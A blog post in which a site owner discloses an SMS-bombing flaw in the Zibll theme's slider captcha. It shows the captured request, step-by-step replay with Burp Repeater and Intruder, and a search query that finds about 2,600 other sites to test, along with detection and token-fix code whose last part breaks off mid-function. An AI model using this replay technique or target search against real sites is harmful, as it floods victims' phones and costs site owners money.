Preamble
I woke up in the middle of the night to an SMS alert from Alibaba Cloud.
![Image 1 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328041537629.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Had the black-market crowd really set its sights on my little site with 5-6k daily active users? I remembered that SMS sign-up is protected by a slider captcha.
![Image 2 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328041624887.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Could it be that there is a hole in it?
Reproducing the vulnerability
Open Burp Suite and enable interception; the Proxy tab should show Intercept is on.
![Image 3 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042003136.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Open a registration page, enter a phone number and click the button to request a verification code.
![Image 4 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328041738635.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
The slider captcha then appears. Complete the slide and capture the request that follows.
![Image 5 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328041826847-1024x659.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
The captured payload is shown below. The parameter that matters is email_phone=, which carries the phone number:

```
name=&email_phone=YOUR_PHONE_NUMBER&captch=&captcha_type=email_phone&password2=&action=signup_captcha&slidercaptcha%5Bspliced%5D=true&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Bverified%5D=true
```

Everything the slider produced travels in the same body as ordinary form fields: slidercaptcha[spliced]=true, a long slidercaptcha[trail][] array of mouse offsets, and slidercaptcha[verified]=true. All of them are values the client asserts about itself; there is no server-issued, single-use token anywhere in the request that the server could check against.
So let's test whether this captcha result can be reused. Right-click the request and choose Send to Repeater.
![Image 6 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042040417-1024x577.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then see whether the number can be changed and the request resent. I swapped in a different phone number and clicked Send.
![Image 7 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042153541-1024x655.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
It went through.
![Image 8 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042248855-1024x298.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
I checked my phone, and the message had indeed arrived.
![Image 9 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042311584.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
So how do the black-market operators turn a hole like this into SMS bombing?
They have large proxy pools; hammering the endpoint we just found from many addresses is all it takes to run what is known as SMS bombing. Because every request carries its own replayable captcha "proof", each one passes the check no matter which proxy it comes from, which is also why blocking by IP alone achieves very little.
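Added example, not code from this post or from the Zibll theme: a small Python detector run over constructed application-log lines. The log format (timestamp, source IP, destination number, action) is an assumption, as is the idea that the site logs the destination number of every SMS it sends. It shows why the proxy pool defeats per-IP counting and what still catches the burst: a sliding-window count over the endpoint as a whole and over each destination number.

```python
"""Spotting an SMS-bombing burst in application logs.

Added example for this post, not the theme's code. The log format is an
assumption and the sample lines are constructed, not real traffic.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) phone=(?P<phone>\S+) action=(?P<action>\S+)$"
)


def parse_line(line):
    """One log line -> dict, or None if the line does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev


def build_sample_log():
    """Constructed sample: three ordinary sign-ups spread over ten minutes,
    then 40 sends inside 40 seconds, each from a different proxy IP, cycling
    over four victim numbers (the proxy-pool pattern described in the post)."""
    base = datetime(2022, 3, 28, 4, 15, 0)
    lines = []
    normal = [("198.51.100.7", "13800000101"),
              ("198.51.100.8", "13800000102"),
              ("198.51.100.9", "13800000103")]
    for i, (ip, phone) in enumerate(normal):
        ts = base + timedelta(minutes=3 * i)
        lines.append(f"{ts.isoformat()} ip={ip} phone={phone} action=signup_captcha")
    for i in range(40):
        ts = base + timedelta(seconds=10 + i)
        lines.append(f"{ts.isoformat()} ip=203.0.113.{i + 1} "
                     f"phone=1390000{i % 4:04d} action=signup_captcha")
    return lines


class SlidingWindow:
    """Per-key event counter over a fixed time window."""

    def __init__(self, window):
        self.window = window
        self.events = defaultdict(deque)

    def add(self, key, ts):
        """Record an event for key at time ts; return the count inside the window."""
        q = self.events[key]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        return len(q)


def detect(lines, window=timedelta(seconds=60),
           per_ip_limit=5, per_phone_limit=3, global_limit=20):
    """Return which keys crossed their threshold. Spread over a proxy pool,
    the per-IP counter never fires; the global and per-phone counters do."""
    by_ip, by_phone, total = (SlidingWindow(window) for _ in range(3))
    alerts = {"ip": set(), "phone": set(), "global": False}
    events = [ev for ev in map(parse_line, lines)
              if ev and ev["action"] == "signup_captcha"]
    for ev in sorted(events, key=lambda e: e["ts"]):
        if by_ip.add(ev["ip"], ev["ts"]) > per_ip_limit:
            alerts["ip"].add(ev["ip"])
        if by_phone.add(ev["phone"], ev["ts"]) > per_phone_limit:
            alerts["phone"].add(ev["phone"])
        if total.add("all", ev["ts"]) > global_limit:
            alerts["global"] = True
    return alerts


if __name__ == "__main__":
    print(detect(build_sample_log()))
```

On the constructed sample the per-IP set stays empty while the global counter and all four victim numbers trip their limits; the thresholds are placeholders to tune against a site's normal sign-up rate.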
Here is a quick demonstration: Burp Suite's Intruder can do the same thing, just more slowly.
Send the captured request to the Intruder module (Send to Intruder).
![Image 10 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042446252-1024x895.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
First click Clear to remove the automatically marked insertion points.
![Image 11 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042600280-1024x461.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then highlight the phone number as the variable and click Add §; Burp wraps the phone number in § markers.
![Image 12 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042649597-1024x390.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then, under Payloads, load a list of phone numbers; you can generate random ones yourself. I generated 100 at random.
![Image 13 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042823818.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Click Load to import them.
![Image 14 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042737180.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Click Start attack and the messages go out as fast as the server will send them. At four fen (0.04 CNY) apiece, Piggy weeps.
![Image 15 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328042923315-1024x514.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
And you can watch the messages being fired off one after another...
![Image 16 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043110287-1024x717.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Field reports
Because Piggy's site runs the Zibll (子比) theme, many fellow site owners on the same theme have said they are suffering just as badly.
![Image 17 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043255143.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
The one in the video looks especially bad.
How to find other sites exposing the same endpoint
The approach is the one from my earlier article.
Here I use Qianxin's Hunter platform. First grab the site's favicon.
![Image 18 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043803332-1024x567.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Then upload it.
![Image 19 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043647850-1024x614.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Click OK to search.
![Image 20 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043720773.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
Hunter only turned up 5 assets for the icon.
![Image 21 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043750499-1024x315.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
The icon does not fingerprint the theme well, so switch to a different query:
web.body="子比"
![Image 22 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043907742.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
That returns far more: over 2,600 assets.
![Image 23 - Notes on the SMS abuse vulnerability on Piggy's site - FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220328043930549-1024x458.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
From there you can go and test whether those sites have the same flaw as mine.
How to fix the vulnerability
My recommendation is token-based verification: the server generates a token, and every call to the SMS endpoint must pass a token check; if the token is missing or wrong, no SMS is sent. For the token to actually close the hole it has to be issued by the server only after the server itself has checked the slider result (not the slidercaptcha[verified] flag the client sends), be bound to the phone number it was issued for, expire quickly, and be invalidated the moment it is used, so that a captured request cannot simply be replayed from Repeater or Intruder. A per-number send limit on top of that caps the damage even when a token is valid. Checking the source IP alone is practically useless as a strategy!
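Added example in Python, not the Zibll theme's code, modelling both sides of the fix described above. The vulnerable endpoint is a stand-in that behaves the way the site was observed to behave (a copied body with a different number is accepted); the hardened one keeps the token server-side, bound to one number, short-lived and single-use, and adds a per-number send limit that does not look at the source IP. The captured body is abridged to three trail entries, and the sms_token field name, the limits and the phone numbers are assumptions.

```python
"""Replay of a client-asserted captcha verdict, and a server-issued single-use token.

Added example for this post, not code from the Zibll theme. The two endpoint
classes model the behaviour described in the post; sms_token is an assumed field.
"""
import secrets
from urllib.parse import parse_qs, urlencode

# Abridged copy of the captured request body from the post: the real
# slidercaptcha[trail][] array has hundreds of entries, three are kept here.
CAPTURED_BODY = (
    "name=&email_phone=13800000000&captch=&captcha_type=email_phone&password2="
    "&action=signup_captcha&slidercaptcha%5Bspliced%5D=true"
    "&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=1"
    "&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Bverified%5D=true"
)


def parse_body(body):
    """Decode a form body; blanks are kept so empty fields stay visible."""
    return parse_qs(body, keep_blank_values=True)


def replay_with_phone(body, new_phone):
    """What Send to Repeater / Intruder did: keep every field, including the
    slider 'proof', and swap only email_phone."""
    f = parse_body(body)
    f["email_phone"] = [new_phone]
    return urlencode(f, doseq=True)


class VulnerableSmsEndpoint:
    """Stand-in for the observed behaviour: the only 'proof' consulted is what
    the client asserts (slidercaptcha[verified]=true), so a copied body with a
    different phone number passes."""

    def __init__(self):
        self.sent = []

    def handle(self, body):
        f = parse_body(body)
        if f.get("action") != ["signup_captcha"]:
            return "bad action"
        if f.get("slidercaptcha[verified]") != ["true"]:
            return "captcha failed"
        self.sent.append(f["email_phone"][0])
        return "sent"


class HardenedSmsEndpoint:
    """Server-side state decides: a token is minted only after the server has
    verified the slider itself, is bound to one phone number, expires, and is
    deleted the moment it is used. A per-number limit caps damage even with a
    valid token and never depends on the source IP."""

    def __init__(self, ttl=120, per_phone_limit=3, per_phone_window=3600):
        self.ttl, self.per_phone_limit, self.per_phone_window = ttl, per_phone_limit, per_phone_window
        self.issued = {}  # token -> (phone, expiry)
        self.sends = {}   # phone -> timestamps of SMS already sent
        self.sent = []

    def captcha_solved(self, phone, slider_ok, now):
        """Call only after the SERVER checked the slider position against the
        puzzle it generated; the client's verified flag is never consulted."""
        if not slider_ok:
            return None
        token = secrets.token_urlsafe(24)
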